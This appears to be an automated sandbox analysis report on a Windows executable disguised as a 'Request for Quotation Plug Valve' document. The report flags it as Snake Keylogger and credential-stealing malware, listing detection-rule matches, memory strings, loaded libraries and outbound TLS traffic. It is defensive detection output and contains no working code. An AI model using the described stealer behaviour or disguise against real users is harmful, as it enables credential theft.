                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49838 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: initial sampleStatic PE information: Filename: Request for Quotation Plug Valve.exe
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02ABD2783_2_02ABD278
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02AB53623_2_02AB5362
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02ABA0883_2_02ABA088
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02ABC19E3_2_02ABC19E
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02AB71183_2_02AB7118
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02ABC7383_2_02ABC738
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02ABC4683_2_02ABC468
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02ABCA083_2_02ABCA08
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02AB69A03_2_02AB69A0
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02ABE9883_2_02ABE988
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02ABCFAA3_2_02ABCFAA
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02ABCCD83_2_02ABCCD8
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02ABF6313_2_02ABF631
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02ABFA883_2_02ABFA88
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02AB29E03_2_02AB29E0
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02ABE97A3_2_02ABE97A
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_02AB3E093_2_02AB3E09
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E1E803_2_068E1E80
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E17A03_2_068E17A0
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E0B303_2_068E0B30
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E9C183_2_068E9C18
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E50283_2_068E5028
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E95483_2_068E9548
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E29683_2_068E2968
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EE6AA3_2_068EE6AA
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EE6B03_2_068EE6B0
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EEAF83_2_068EEAF8
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EDE003_2_068EDE00
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EE24A3_2_068EE24A
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EE2583_2_068EE258
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E1E703_2_068E1E70
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E178F3_2_068E178F
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E8B903_2_068E8B90
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EF3A83_2_068EF3A8
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E8BA03_2_068E8BA0
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EF3B83_2_068EF3B8
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EEB083_2_068EEB08
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E93283_2_068E9328
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E0B203_2_068E0B20
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EEF513_2_068EEF51
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EEF603_2_068EEF60
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068ECC8F3_2_068ECC8F
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068ECCA03_2_068ECCA0
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068ED0F83_2_068ED0F8
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E00063_2_068E0006
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EF8023_2_068EF802
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E50183_2_068E5018
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EF8103_2_068EF810
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E00403_2_068E0040
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EFC5E3_2_068EFC5E
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EFC683_2_068EFC68
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068ED9993_2_068ED999
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068ED9A83_2_068ED9A8
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068EDDF23_2_068EDDF2
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068ED5403_2_068ED540
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E295B3_2_068E295B
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068ED5503_2_068ED550
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2247638196.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Request for Quotation Plug Valve.exe
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation Plug Valve.exe
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Request for Quotation Plug Valve.exe
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2253417863.0000000006D70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Request for Quotation Plug Valve.exe
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000000.2235514481.0000000000442000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYpWp.exe, vs Request for Quotation Plug Valve.exe
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2249572786.000000000286E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation Plug Valve.exe
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4703643862.0000000000CF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Request for Quotation Plug Valve.exe
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation Plug Valve.exe
                    Source: Request for Quotation Plug Valve.exeBinary or memory string: OriginalFilenameYpWp.exe, vs Request for Quotation Plug Valve.exe
                    Source: Request for Quotation Plug Valve.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Request for Quotation Plug Valve.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, -tj-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, -tj-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, -tj-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, -tj-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, NsTPTGXblfc3bcgyRi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, NsTPTGXblfc3bcgyRi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, oVQmUjFt7ORJGqy8CL.csSecurity API names: _0020.SetAccessControl
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, oVQmUjFt7ORJGqy8CL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, oVQmUjFt7ORJGqy8CL.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, oVQmUjFt7ORJGqy8CL.csSecurity API names: _0020.SetAccessControl
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, oVQmUjFt7ORJGqy8CL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, oVQmUjFt7ORJGqy8CL.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@5/4
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Request for Quotation Plug Valve.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeMutant created: NULL
                    Source: Request for Quotation Plug Valve.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Request for Quotation Plug Valve.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002E42000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002E52000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002E60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Request for Quotation Plug Valve.exeReversingLabs: Detection: 55%
                    Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe "C:\Users\user\Desktop\Request for Quotation Plug Valve.exe"
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess created: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe "C:\Users\user\Desktop\Request for Quotation Plug Valve.exe"
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess created: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe "C:\Users\user\Desktop\Request for Quotation Plug Valve.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: rasadhlp.dllJump to behavior
